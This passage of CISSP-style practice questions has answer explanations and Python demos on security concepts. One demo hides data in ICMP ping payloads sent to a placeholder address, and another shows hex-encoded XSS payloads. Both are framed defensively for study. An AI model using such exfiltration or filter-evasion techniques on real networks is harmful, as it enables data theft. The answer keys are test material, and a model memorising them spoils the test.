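# A brand-new virus has no signature yet, but its behavior still scores high.
print(signature_scan(b"novel malware body"))                                 # False
print(heuristic_scan(["replicates_itself", "disables_security_software"]))   # True
```

The false-positive risk mentioned above is visible here too: a legitimate installer that writes to a system directory and opens many connections could cross the same threshold.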
The key benefits of a signed and encrypted e-mail include
confidentiality, authentication, and authorization.
confidentiality, non-repudiation, and authentication.
non-repudiation, authorization, and authentication.
non-repudiation, confidentiality, and authorization.
A signed and encrypted e-mail provides confidentiality by preventing unauthorized access to the message content; non-repudiation, because the digital signature prevents the sender from later denying having sent the message; and authentication, by verifying that the message came from the claimed source. Authorization is not a benefit of a signed and encrypted e-mail, as it refers to the process of granting or denying access to resources based on predefined rules.
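As a rough sketch of how these properties arise, the following example uses the third-party Python cryptography package. Real S/MIME or PGP clients wrap the symmetric key with the recipient's public key; that key-wrapping step is omitted here for brevity:

```python
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

# Sender's key pair: the signature gives authentication and non-repudiation.
sender_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
message = b"Quarterly report attached."

signature = sender_key.sign(
    message,
    padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),
    hashes.SHA256(),
)

# Symmetric encryption of the body gives confidentiality.
body_key = Fernet.generate_key()
ciphertext = Fernet(body_key).encrypt(message)

# Recipient side: decrypt the body, then verify the signature.
plaintext = Fernet(body_key).decrypt(ciphertext)
sender_key.public_key().verify(  # raises InvalidSignature if tampered with
    signature,
    plaintext,
    padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),
    hashes.SHA256(),
)
print("decrypted and verified:", plaintext.decode())
```

The verify call fails if the message was altered, which is what ties the message to the sender and prevents later denial.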
Which layer of the Open Systems Interconnections (OSI) model implementation adds information concerning the logical connection between the sender and receiver?
Physical
Session
Transport
Data-Link
The Transport layer of the Open Systems Interconnection (OSI) model implementation adds information concerning the logical connection between the sender and receiver. The Transport layer is responsible for establishing, maintaining, and terminating the end-to-end communication between two hosts, as well as ensuring the reliability, integrity, and flow control of the data. The Transport layer uses protocols such as TCP and UDP to provide connection-oriented or connectionless services, and adds headers that contain information such as source and destination ports, sequence and acknowledgment numbers, and checksums. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 5, page 499; CISSP For Dummies, 7th Edition, Chapter 5, page 145.
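A quick way to observe this Layer 4 logical connection is to inspect the port pairs on a TCP socket. This minimal sketch opens a loopback connection and prints the (address, port) endpoints that identify it:

```python
import socket
import threading

# Server: listen on loopback; the OS assigns a free port.
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind(("127.0.0.1", 0))
srv.listen(1)
host, port = srv.getsockname()

def serve() -> None:
    conn, peer = srv.accept()
    print("server sees client endpoint:", peer)  # (ip, ephemeral source port)
    conn.close()

t = threading.Thread(target=serve)
t.start()

# Client: the logical connection is identified by the
# (source ip, source port, destination ip, destination port) pair.
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cli.connect((host, port))
print("client endpoint:", cli.getsockname(), "-> server endpoint:", cli.getpeername())
cli.close()
t.join()
srv.close()
```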
A security professional has just completed their organization's Business Impact Analysis (BIA). Following Business Continuity Plan/Disaster Recovery Plan (BCP/DRP) best practices, what would be the professional's NEXT step?
Identify and select recovery strategies.
Present the findings to management for funding.
Select members for the organization's recovery teams.
Prepare a plan to test the organization's ability to recover its operations.
The next step after completing the organization’s Business Impact Analysis (BIA) is to identify and select recovery strategies. A BIA is a process of analyzing the potential impact and consequences of a disruption or disaster on the organization’s critical business functions and processes. A BIA helps to identify the recovery objectives, priorities, and requirements for the organization. Based on the BIA results, the organization should identify and select the recovery strategies that are suitable and feasible for restoring the critical business functions and processes within the acceptable time frame and cost. The recovery strategies may include technical, operational, organizational, or contractual solutions, such as backup systems, alternate sites, mutual aid agreements, or insurance policies. References: Business Impact Analysis | Ready.gov; Business Continuity Planning Process Diagram.
What would be the PRIMARY concern when designing and coordinating a security assessment for an Automatic Teller Machine (ATM) system?
Physical access to the electronic hardware
Regularly scheduled maintenance process
Availability of the network connection
Processing delays
The primary concern when designing and coordinating a security assessment for an Automatic Teller Machine (ATM) system is the availability of the network connection. An ATM system relies on a network connection to communicate with the bank’s servers and process the transactions of the customers. If the network connection is disrupted, degraded, or compromised, the ATM system may not be able to function properly, or may expose the customers’ data or money to unauthorized access or theft. Therefore, a security assessment for an ATM system should focus on ensuring that the network connection is reliable, resilient, and secure, and that there are backup or alternative solutions in case of network failure. References: ATM Security: Best Practices for Automated Teller Machines; ATM Security: A Comprehensive Guide.
What is the MOST effective countermeasure to a malicious code attack against a mobile system?
Sandbox
Change control
Memory management
Public-Key Infrastructure (PKI)
A sandbox is a security mechanism that isolates a potentially malicious code or application from the rest of the system, preventing it from accessing or modifying any sensitive data or resources. A sandbox can be implemented at the operating system, application, or network level, and can provide a safe environment for testing, debugging, or executing untrusted code. A sandbox is the most effective countermeasure to a malicious code attack against a mobile system, as it can prevent the code from spreading, stealing, or destroying any information on the device. Change control, memory management, and PKI are not directly related to preventing or mitigating malicious code attacks on mobile systems. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 8, page 507.
The birthday attack is MOST effective against which one of the following cipher technologies?
Chaining block encryption
Asymmetric cryptography
Cryptographic hash
Streaming cryptography
The birthday attack is most effective against cryptographic hash, which is one of the cipher technologies. A cryptographic hash is a function that takes an input of any size and produces an output of a fixed size, called a hash or a digest, that represents the input. A cryptographic hash has several properties, such as being one-way, collision-resistant, and deterministic. A birthday attack is a type of brute-force attack that exploits the mathematical phenomenon known as the birthday paradox: in a set of randomly chosen elements, the probability that some pair shares the same value grows surprisingly quickly with the size of the set, so for a hash with 2^n possible outputs a collision is expected after roughly 2^(n/2) attempts rather than 2^n. A birthday attack can be used to find collisions in a cryptographic hash, which means finding two different inputs that produce the same hash. Finding collisions can compromise the integrity or the security of the hash, as it can allow an attacker to forge or modify the input without changing the hash. Chaining block encryption, asymmetric cryptography, and streaming cryptography are not as vulnerable to the birthday attack, as they are different types of encryption algorithms that use keys and ciphers to transform the input into an output. References: Official (ISC)2 CISSP CBK Reference, 5th Edition, Chapter 3, page 133; CISSP All-in-One Exam Guide, Eighth Edition, Chapter 3, page 143.
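The effect is easy to demonstrate against a deliberately truncated hash. With only 4 bytes (32 bits) of digest, a collision is expected after roughly 2^16 random inputs; this sketch usually finds one in well under a second:

```python
import hashlib
import os

def truncated_hash(data: bytes, n_bytes: int = 4) -> bytes:
    """SHA-256 truncated to n_bytes - weak on purpose, for demonstration."""
    return hashlib.sha256(data).digest()[:n_bytes]

seen: dict[bytes, bytes] = {}
attempts = 0
while True:
    message = os.urandom(8)          # random candidate input
    attempts += 1
    digest = truncated_hash(message)
    if digest in seen and seen[digest] != message:
        print(f"Collision after {attempts} attempts:")
        print(" ", seen[digest].hex(), "and", message.hex(), "->", digest.hex())
        break
    seen[digest] = message
```

A full 256-bit digest makes the same search computationally infeasible, which is why collision resistance depends on digest length.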
While impersonating an Information Security Officer (ISO), an attacker obtains information from company employees about their User IDs and passwords. Which method of information gathering has the attacker used?
Trusted path
Malicious logic
Social engineering
Passive misuse
Social engineering is the method of information gathering that the attacker has used while impersonating an ISO and obtaining information from company employees about their User IDs and passwords. Social engineering is a technique of manipulating or deceiving people into revealing confidential or sensitive information, or performing actions that compromise the security of an organization or a system. Social engineering can exploit the human factors, such as trust, curiosity, fear, or greed, to influence the behavior or judgment of the target. Social engineering can take various forms, such as phishing, baiting, pretexting, or impersonation. Trusted path, malicious logic, and passive misuse are not methods of information gathering that the attacker has used, as they are related to different aspects of security or attack. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1, page 19.
Which of the following would be the FIRST step to take when implementing a patch management program?
Perform automatic deployment of patches.
Monitor for vulnerabilities and threats.
Prioritize vulnerability remediation.
Create a system inventory.
The first step to take when implementing a patch management program is to create a system inventory. A system inventory is a comprehensive list of all the hardware and software assets in the organization, such as servers, workstations, laptops, mobile devices, routers, switches, firewalls, operating systems, applications, firmware, etc. A system inventory helps to identify the scope and complexity of the patch management program, as well as the current patch status and vulnerabilities of each asset. A system inventory also helps to prioritize and schedule patch deployment, monitor patch compliance, and report patch performance. References: Patch Management Best Practices; Patch Management Process.
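A system inventory can start as simply as one structured record per asset. This hypothetical sketch shows the kind of fields that the later patch-management steps (monitoring, prioritization, deployment) depend on:

```python
from dataclasses import dataclass, field

@dataclass
class Asset:
    hostname: str
    asset_type: str              # e.g. "server", "workstation", "router"
    os_name: str
    os_version: str
    installed_patches: list[str] = field(default_factory=list)

inventory = [
    Asset("web01", "server", "Ubuntu", "22.04", ["USN-6123-1"]),
    Asset("hr-laptop-07", "workstation", "Windows", "11 23H2", []),
]

# Later steps query this inventory, e.g. to find assets with no recorded patches.
unpatched = [a.hostname for a in inventory if not a.installed_patches]
print("assets with no recorded patches:", unpatched)
```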
What is the MOST important purpose of testing the Disaster Recovery Plan (DRP)?
Evaluating the efficiency of the plan
Identifying the benchmark required for restoration
Validating the effectiveness of the plan
Determining the Recovery Time Objective (RTO)
The most important purpose of testing the Disaster Recovery Plan (DRP) is to validate the effectiveness of the plan. A DRP is a document that outlines the procedures and steps to be followed in the event of a disaster that disrupts the normal operations of an organization. A DRP aims to minimize the impact of the disaster, restore the critical functions and systems, and resume the normal operations as soon as possible. Testing the DRP is essential to ensure that the plan is feasible, reliable, and up-to-date. Testing the DRP can reveal any errors, gaps, or weaknesses in the plan, and provide feedback and recommendations for improvement. Testing the DRP can also increase the confidence and readiness of the staff, and ensure compliance with the regulatory and contractual requirements. References: What Is Disaster Recovery Testing and Why Is It Important?; Disaster Recovery Plan Testing in IT.
Which one of these risk factors would be the LEAST important consideration in choosing a building site for a new computer facility?
Vulnerability to crime
Adjacent buildings and businesses
Proximity to an airline flight path
Vulnerability to natural disasters
Proximity to an airline flight path is the least important consideration in choosing a building site for a new computer facility, as it poses the lowest risk factor compared to the other options. Proximity to an airline flight path may cause some noise or interference issues, but it is unlikely to result in a major disaster or damage to the computer facility, unless there is a rare case of a plane crash or a terrorist attack. Vulnerability to crime, adjacent buildings and businesses, and vulnerability to natural disasters are more important considerations in choosing a building site for a new computer facility, as they can pose significant threats to the physical security, availability, and integrity of the facility and its assets. Vulnerability to crime can expose the facility to theft, vandalism, or sabotage. Adjacent buildings and businesses can affect the fire safety, power supply, or environmental conditions of the facility. Vulnerability to natural disasters can cause the facility to suffer from floods, earthquakes, storms, or fires. References: Official (ISC)2 CISSP CBK Reference, 5th Edition, Chapter 10, page 543.
The overall goal of a penetration test is to determine a system's
ability to withstand an attack.
capacity management.
error recovery capabilities.
reliability under stress.
A penetration test is a simulated attack on a system or network, performed by authorized testers, to evaluate the security posture and identify vulnerabilities that could be exploited by malicious actors. The overall goal of a penetration test is to determine the system’s ability to withstand an attack, and to provide recommendations for improving the security controls and mitigating the risks. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7, page 757; CISSP For Dummies, 7th Edition, Chapter 7, page 233.
Which of the following is a security feature of Global Systems for Mobile Communications (GSM)?
It uses a Subscriber Identity Module (SIM) for authentication.
It uses encrypting techniques for all communications.
The radio spectrum is divided with multiple frequency carriers.
The signal is difficult to read as it provides end-to-end encryption.
A security feature of Global Systems for Mobile Communications (GSM) is that it uses a Subscriber Identity Module (SIM) for authentication. A SIM is a smart card that contains the subscriber’s identity, phone number, network information, and encryption keys. The SIM is inserted into the mobile device and communicates with the network to authenticate the subscriber and establish a secure connection. The SIM also stores the subscriber’s contacts, messages, and preferences. The SIM provides security by preventing unauthorized access to the subscriber’s account and data, and by allowing the subscriber to easily switch devices without losing their information. References: GSM - Security and Encryption; Introduction to GSM security.
Multi-threaded applications are more at risk than single-threaded applications to
race conditions.
virus infection.
packet sniffing.
database injection.
Multi-threaded applications are more at risk than single-threaded applications to race conditions. A race condition is a type of concurrency error that occurs when two or more threads access or modify the same shared resource without proper synchronization or coordination. This may result in inconsistent, unpredictable, or erroneous outcomes, as the final result depends on the timing and order of the thread execution. Race conditions can compromise the security, reliability, and functionality of the application, and can lead to data corruption, memory leaks, deadlocks, or privilege escalation. References: What is a Race Condition?; Race Conditions - OWASP Cheat Sheet Series.
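The lost-update pattern described above can be reproduced in a few lines. In this sketch the read and the write of the shared counter can interleave across threads, so the final total usually falls short of the expected value (results vary from run to run):

```python
import threading

counter = 0
lock = threading.Lock()

def unsafe_increment(iterations: int) -> None:
    global counter
    for _ in range(iterations):
        current = counter        # read shared state
        counter = current + 1    # write it back - another thread may have
                                 # updated counter in between (lost update)

threads = [threading.Thread(target=unsafe_increment, args=(100_000,))
           for _ in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print("expected 400000, got", counter)  # typically less than 400000

# The fix is to make the read-modify-write atomic, e.g.:
#     with lock:
#         counter += 1
```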
In the area of disaster planning and recovery, what strategy entails the presentation of information about the plan?
Communication
Planning
Recovery
Escalation
Communication is the strategy that involves the presentation of information about the disaster recovery plan to the stakeholders, such as management, employees, customers, vendors, and regulators. Communication ensures that everyone is aware of their roles and responsibilities in the event of a disaster, and that the plan is updated and tested regularly. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 10, page 1019; CISSP For Dummies, 7th Edition, Chapter 10, page 343.
An organization is selecting a service provider to assist in the consolidation of multiple computing sites including development, implementation and ongoing support of various computer systems. Which of the following MUST be verified by the Information Security Department?
The service provider's policies are consistent with ISO/IEC 27001 and there is evidence that the service provider is following those policies.
The service provider will segregate the data within its systems and ensure that each region's policies are met.
The service provider will impose controls and protections that meet or exceed the current systems controls and produce audit logs as verification.
The service provider's policies can meet the requirements imposed by the new environment even if they differ from the organization's current policies.
The Information Security Department must verify that the service provider will impose controls and protections that meet or exceed the current systems controls and produce audit logs as verification. This is to ensure that the service provider will maintain or improve the security posture of the organization, and that the organization will be able to monitor and audit the service provider’s performance and compliance. The service provider’s policies may or may not be consistent with ISO/IEC 27001, but this is not a mandatory requirement, as long as the service provider can meet the organization’s security needs and expectations. The service provider may or may not segregate the data within its systems, depending on the type and sensitivity of the data, and the contractual and regulatory obligations. The service provider’s policies may differ from the organization’s current policies, as long as they can meet the requirements imposed by the new environment, and are agreed upon by both parties. References: How to Choose a Managed Security Service Provider (MSSP); 10 Questions to Ask Your Managed Security Service Provider.
Logical access control programs are MOST effective when they are
approved by external auditors.
combined with security token technology.
maintained by computer security officers.
made part of the operating system.
Logical access control programs are most effective when they are made part of the operating system. Logical access control is the process of granting or denying access to information or resources based on the identity, role, or credentials of the user or device. Logical access control programs, such as authentication, authorization, and auditing mechanisms, can be implemented at different levels of the system, such as the application, the database, or the network. However, the most effective level is the operating system, as it provides the lowest and most comprehensive layer of access control, and can enforce the principle of least privilege and the separation of duties for all users and processes. Approval by external auditors, combination with security token technology, and maintenance by computer security officers are not factors that affect the effectiveness of logical access control programs, as they are more related to the compliance, assurance, and administration of the access control policies. References: Official (ISC)2 CISSP CBK Reference, 5th Edition, Chapter 5, page 247; CISSP All-in-One Exam Guide, Eighth Edition, Chapter 6, page 353.
Which of the following is the MOST important consideration when storing and processing Personally Identifiable Information (PII)?
Encrypt and hash all PII to avoid disclosure and tampering.
Store PII for no more than one year.
Avoid storing PII in a Cloud Service Provider.
Adherence to collection limitation laws and regulations.
The most important consideration when storing and processing PII is to adhere to the collection limitation laws and regulations that apply to the jurisdiction and context of the data processing. Collection limitation is a principle that states that PII should be collected only for a specific, legitimate, and lawful purpose, and only to the extent that is necessary for that purpose. By following this principle, the data processor can minimize the amount of PII that is stored and processed, and reduce the risk of data breaches, misuse, or unauthorized access. Encrypting and hashing all PII, storing PII for no more than one year, and avoiding storing PII in a cloud service provider are also good practices for protecting PII, but they are not as important as adhering to the collection limitation laws and regulations. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 5, page 290.
An organization allows ping traffic into and out of their network. An attacker has installed a program on the network that uses the payload portion of the ping packet to move data into and out of the network. What type of attack has the organization experienced?
Data leakage
Unfiltered channel
Data emanation
Covert channel
The organization has experienced a covert channel attack, which is a technique of hiding or transferring data within a communication channel that is not intended for that purpose. In this case, the attacker has used the payload portion of the ping packet, which is normally used to carry diagnostic data, to move data into and out of the network. This way, the attacker can bypass the network security controls and avoid detection. Data leakage (A) is a general term for the unauthorized disclosure of sensitive or confidential data, which may or may not involve a covert channel. Unfiltered channel (B) is a term for a communication channel that does not have any security mechanisms or filters applied to it, which may allow unauthorized or malicious traffic to pass through. Data emanation (C) is a term for the unintentional radiation or emission of electromagnetic signals from electronic devices, which may reveal sensitive or confidential information to eavesdroppers. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 4, page 179; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 4, page 189.
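The mechanics can be sketched with the third-party scapy package (sending and sniffing raw packets requires administrator privileges; the destination address and payload below are hypothetical):

```python
# Sketch using the third-party scapy package (needs root/administrator rights).
from scapy.all import ICMP, IP, Raw, send, sniff

# Attacker side: hide data in the echo-request payload, where diagnostic
# padding normally lives.
packet = IP(dst="198.51.100.7") / ICMP(type=8) / Raw(load=b"exfil-chunk-01")
send(packet, verbose=False)

# Defender side: ordinary pings carry fixed-size, predictable padding, so
# unusual payload sizes or contents are a detection signal.
def inspect(pkt) -> None:
    if pkt.haslayer(ICMP) and pkt.haslayer(Raw):
        payload = bytes(pkt[Raw].load)
        if len(payload) != 56:  # a common default ping payload size
            print("suspicious ICMP payload:", payload[:32])

sniff(filter="icmp", prn=inspect, count=10)
```

This is also why many organizations filter or inspect ICMP rather than allowing ping traffic through unexamined.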
Which type of control recognizes that a transaction amount is excessive in accordance with corporate policy?
Detection
Prevention
Investigation
Correction
A detection control is a type of control that identifies and reports the occurrence of an unwanted event, such as a violation of a policy or a threshold. A detection control does not prevent or correct the event, but rather alerts the appropriate personnel or system to take action. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1, page 29; CISSP For Dummies, 7th Edition, Chapter 1, page 21.
Which of the following BEST represents the principle of open design?
Disassembly, analysis, or reverse engineering will reveal the security functionality of the computer system.
Algorithms must be protected to ensure the security and interoperability of the designed system.
A knowledgeable user should have limited privileges on the system to prevent their ability to compromise security capabilities.
The security of a mechanism should not depend on the secrecy of its design or implementation.
This is the principle of open design, which states that the security of a system or mechanism should rely on the strength of its key or algorithm, rather than on the obscurity of its design or implementation. This principle is based on the assumption that the adversary has full knowledge of the system or mechanism, and that the security should still hold even if that is the case. The other options are not consistent with the principle of open design, as they either imply that the security depends on hiding or protecting the design or implementation (A and B), or that the user’s knowledge or privileges affect the security (C). References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 3, page 105; Official (ISC)2 CISSP CBK Reference, Fifth Edition, Chapter 3, page 109.
When constructing an Information Protection Policy (IPP), it is important that the stated rules are necessary, adequate, and
flexible.
confidential.
focused.
achievable.
An Information Protection Policy (IPP) is a document that defines the objectives, scope, roles, responsibilities, and rules for protecting the information assets of an organization. An IPP should be aligned with the business goals and legal requirements, and should be communicated and enforced throughout the organization. When constructing an IPP, it is important that the stated rules are necessary, adequate, and achievable, meaning that they are relevant, sufficient, and realistic for the organization’s context and capabilities. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1, page 23; CISSP For Dummies, 7th Edition, Chapter 1, page 15.
Which one of the following transmission media is MOST effective in preventing data interception?
Microwave
Twisted-pair
Fiber optic
Coaxial cable
Fiber optic is the most effective transmission media in preventing data interception, as it uses light signals to transmit data over thin glass or plastic fibers. Fiber optic cables are immune to electromagnetic interference, which makes them far more difficult to tap or eavesdrop on with external devices or signals. Fiber optic cables also have a low attenuation rate, which means that they can transmit data over long distances without losing much signal strength or quality. Microwave, twisted-pair, and coaxial cable are less effective transmission media in preventing data interception, as they use electromagnetic waves or electrical signals to transmit data over metal wires or air. These media are susceptible to interference, noise, or tapping, which can compromise the confidentiality or integrity of the data. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7, page 406; CISSP For Dummies, 7th Edition, Chapter 4, page 85.
Which of the following is ensured when hashing files during chain of custody handling?
Availability
Accountability
Integrity
Non-repudiation
Hashing files during chain of custody handling ensures integrity, which means that the files have not been altered or tampered with during the collection, preservation, or analysis of digital evidence. Hashing is a process of applying a mathematical function to a file to generate a unique value, called a hash or a digest, that represents the file’s content. By comparing the hash values of the original and the copied files, the integrity of the files can be verified. Availability, accountability, and non-repudiation are not ensured by hashing files during chain of custody handling, as they are related to different aspects of information security. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 10, page 633.
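In practice this is a digest comparison between the original evidence and each working copy; the file paths in this sketch are hypothetical:

```python
import hashlib

def file_sha256(path: str) -> str:
    """Hash a file in chunks so large evidence images fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        while chunk := f.read(65536):
            h.update(chunk)
    return h.hexdigest()

original_digest = file_sha256("evidence/disk.img")       # hashed at seizure
working_digest = file_sha256("analysis/disk-copy.img")   # hashed before analysis

if original_digest == working_digest:
    print("Integrity verified; record both digests in the chain-of-custody log.")
else:
    print("Digest mismatch - the copy is not a faithful duplicate.")
```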
Which one of the following effectively obscures network addresses from external exposure when implemented on a firewall or router?
Network Address Translation (NAT)
Application Proxy
Routing Information Protocol (RIP) Version 2
Address Masking
Network Address Translation (NAT) is the most effective method for obscuring network addresses from external exposure when implemented on a firewall or router. NAT is a technique that allows a device, such as a firewall or a router, to modify the source or destination IP address of a packet as it passes through the device. NAT can be used to hide the internal IP addresses of a network from the external network, such as the internet, by replacing them with a public IP address. This can enhance the security and privacy of the network, as well as conserve the limited IPv4 address space. Application proxy, RIP version 2, and address masking are not methods for obscuring network addresses from external exposure, as they are either related to different functions or not implemented on a firewall or router. References: Official (ISC)2 CISSP CBK Reference, 5th Edition, Chapter 4, page 196; CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7, page 413.
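A toy model of source NAT shows how internal endpoints disappear behind a single public address; all addresses below are documentation-range examples, and real NAT devices track far more state (protocol, destination, timeouts):

```python
# Toy source-NAT table: (private_ip, private_port) -> public source port.
PUBLIC_IP = "203.0.113.5"
nat_table: dict[tuple[str, int], int] = {}
next_public_port = 40000

def translate_outbound(src_ip: str, src_port: int) -> tuple[str, int]:
    """Rewrite an internal endpoint to the shared public endpoint."""
    global next_public_port
    key = (src_ip, src_port)
    if key not in nat_table:
        nat_table[key] = next_public_port
        next_public_port += 1
    return (PUBLIC_IP, nat_table[key])

# Two internal hosts leave the network looking like the same public address.
print(translate_outbound("192.168.1.10", 51515))  # ('203.0.113.5', 40000)
print(translate_outbound("192.168.1.22", 51600))  # ('203.0.113.5', 40001)
```

The external network only ever sees 203.0.113.5, which is the obscuring effect the answer describes.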
Alternate encoding such as hexadecimal representations is MOST often observed in which of the following forms of attack?
Smurf
Rootkit exploit
Denial of Service (DoS)
Cross site scripting (XSS)
Alternate encoding such as hexadecimal representations is most often observed in cross site scripting (XSS) attacks. XSS is a type of web application attack that involves injecting malicious code or scripts into a web page or a web application, usually through user input fields or parameters. The malicious code or script is then executed by the victim’s browser, and can perform various actions, such as stealing cookies, session tokens, or credentials, redirecting to malicious sites, or displaying fake content. Alternate encoding is a technique that is used by attackers to bypass input validation or filtering mechanisms, and to conceal or obfuscate the malicious code or script. Alternate encoding can use hexadecimal, decimal, octal, binary, or Unicode representations of the characters or symbols in the code or script. References: What is Cross-Site Scripting (XSS)?; XSS Filter Evasion Cheat Sheet.
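The same payload can be written many ways, which is why naive string filters fail. This sketch shows two common alternate encodings of one script tag:

```python
from urllib.parse import quote

payload = "<script>alert(1)</script>"

# Percent (URL) encoding, often seen in query strings:
print(quote(payload, safe=""))
# %3Cscript%3Ealert%281%29%3C%2Fscript%3E

# Hexadecimal HTML character references, often seen in injected markup:
print("".join(f"&#x{ord(c):x};" for c in payload))
# &#x3c;&#x73;&#x63;... (every character escaped)

# A filter that only looks for the literal string "<script>" misses both forms,
# which is why output encoding and canonicalization beat blacklist filtering.
```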
Why MUST a Kerberos server be well protected from unauthorized access?
It contains the keys of all clients.
It always operates at root privilege.
It contains all the tickets for services.
It contains the Internet Protocol (IP) address of all network entities.
A Kerberos server must be well protected from unauthorized access because it contains the keys of all clients. Kerberos is a network authentication protocol that uses symmetric cryptography and a trusted third party, called the Key Distribution Center (KDC), to provide secure and mutual authentication between clients and servers. The KDC consists of two components: the Authentication Server (AS) and the Ticket Granting Server (TGS). The AS issues a Ticket Granting Ticket (TGT) to the client after verifying its identity and password. The TGS issues a service ticket to the client after validating its TGT and the requested service. The client then uses the service ticket to access the service. The KDC stores the keys of all clients and services in its database, and uses them to encrypt and decrypt the tickets. If an attacker gains access to the KDC, they can compromise the keys and the tickets, and impersonate any client or service on the network. References: CISSP For Dummies, 7th Edition, Chapter 4, page 91.
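A toy model makes the risk concrete: the KDC below is reduced to a dictionary holding every principal's secret key, which is exactly why the real database must be so well protected. The names and keys are invented, and real Kerberos adds timestamps, ticket lifetimes, and authenticators omitted here:

```python
import json

from cryptography.fernet import Fernet

# Toy KDC database: the long-term secret key of every principal.
kdc_db = {
    "alice": Fernet.generate_key(),      # a client
    "fileserv": Fernet.generate_key(),   # a service
}

# Ticket issuance: a fresh session key sealed under the *service's* key...
session_key = Fernet.generate_key()
ticket = Fernet(kdc_db["fileserv"]).encrypt(
    json.dumps({"client": "alice", "session_key": session_key.decode()}).encode()
)
# ...and a copy of the session key sealed under the *client's* key.
for_alice = Fernet(kdc_db["alice"]).encrypt(session_key)

# The service opens the ticket with its own long-term key.
opened = json.loads(Fernet(kdc_db["fileserv"]).decrypt(ticket))
print("service accepts session for:", opened["client"])

# Anyone who copies kdc_db can mint tickets for any client or service,
# which is why compromise of the KDC is a compromise of the whole realm.
```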
In a basic SYN flood attack, what is the attacker attempting to achieve?
Exceed the threshold limit of the connection queue for a given service
Set the threshold to zero for a given service
Cause the buffer to overflow, allowing root access
Flush the register stack, allowing hijacking of the root account
A SYN flood attack is a type of denial-of-service attack that exploits the TCP three-way handshake process. The attacker sends a large number of SYN packets to the target server, often with spoofed IP addresses, and does not complete the handshake by sending the final ACK packet. This causes the server to allocate resources for half-open connections, which eventually consume all the available slots in the connection queue and prevent legitimate traffic from reaching the server. In other words, the attacker is attempting to exceed the threshold limit of the connection queue for a given service.
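A toy simulation of the half-open connection queue shows the exhaustion mechanism; the backlog size is deliberately tiny, and real TCP stacks add timers and defenses such as SYN cookies:

```python
BACKLOG = 5  # pending half-open connections this toy 'server' will hold

half_open: dict[str, str] = {}

def receive_syn(client: str) -> str:
    if len(half_open) >= BACKLOG:
        return f"SYN from {client}: dropped (queue full - service denied)"
    half_open[client] = "SYN-RECEIVED"   # waiting for the final ACK
    return f"SYN from {client}: SYN/ACK sent, slot reserved"

# Attacker sends SYNs from spoofed sources and never completes the handshake.
for i in range(6):
    print(receive_syn(f"spoofed-{i}"))

# A legitimate client now finds no free slot.
print(receive_syn("legitimate-client"))
```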
Which of the following is an initial consideration when developing an information security management system?
Identify the contractual security obligations that apply to the organizations
Understand the value of the information assets
Identify the level of residual risk that is tolerable to management
Identify relevant legislative and regulatory compliance requirements
When developing an information security management system (ISMS), an initial consideration is to understand the value of the information assets that the organization owns or processes. An information asset is any data, information, or knowledge that has value to the organization and supports its mission, objectives, and operations. Understanding the value of the information assets helps to determine the appropriate level of protection and investment for them, as well as the potential impact and consequences of losing, compromising, or disclosing them. Understanding the value of the information assets also helps to identify the stakeholders, owners, and custodians of the information assets, and their roles and responsibilities in the ISMS.
The other options are not initial considerations, but rather subsequent or concurrent considerations when developing an ISMS. Identifying the contractual security obligations that apply to the organizations is a consideration that depends on the nature, scope, and context of the information assets, as well as the relationships and agreements with the external parties. Identifying the level of residual risk that is tolerable to management is a consideration that depends on the risk appetite and tolerance of the organization, as well as the risk assessment and analysis of the information assets. Identifying relevant legislative and regulatory compliance requirements is a consideration that depends on the legal and ethical obligations and expectations of the organization, as well as the jurisdiction and industry of the information assets.
An organization has doubled in size due to a rapid market share increase. The size of the Information Technology (IT) staff has maintained pace with this growth. The organization hires several contractors whose onsite time is limited. The IT department has pushed its limits building servers and rolling out workstations and has a backlog of account management requests.
Which contract is BEST in offloading the task from the IT staff?
Platform as a Service (PaaS)
Identity as a Service (IDaaS)
Desktop as a Service (DaaS)
Software as a Service (SaaS)
Identity as a Service (IDaaS) is the best contract in offloading the task of account management from the IT staff. IDaaS is a cloud-based service that provides identity and access management (IAM) functions, such as user authentication, authorization, provisioning, deprovisioning, password management, single sign-on (SSO), and multifactor authentication (MFA). IDaaS can help the organization to streamline and automate the account management process, reduce the workload and costs of the IT staff, and improve the security and compliance of the user accounts. IDaaS can also support the contractors who have limited onsite time, as they can access the organization’s resources remotely and securely through the IDaaS provider.
The other options are not as effective as IDaaS in offloading the task of account management from the IT staff, as they do not provide IAM functions. Platform as a Service (PaaS) is a cloud-based service that provides a platform for developing, testing, and deploying applications, but it does not manage the user accounts for the applications. Desktop as a Service (DaaS) is a cloud-based service that provides virtual desktops for users to access applications and data, but it does not manage the user accounts for the virtual desktops. Software as a Service (SaaS) is a cloud-based service that provides software applications for users to use, but it does not manage the user accounts for the software applications.
Which of the following BEST describes the responsibilities of a data owner?
Ensuring quality and validation through periodic audits for ongoing data integrity
Maintaining fundamental data availability, including data storage and archiving
Ensuring accessibility to appropriate users, maintaining appropriate levels of data security
Determining the impact the information has on the mission of the organization
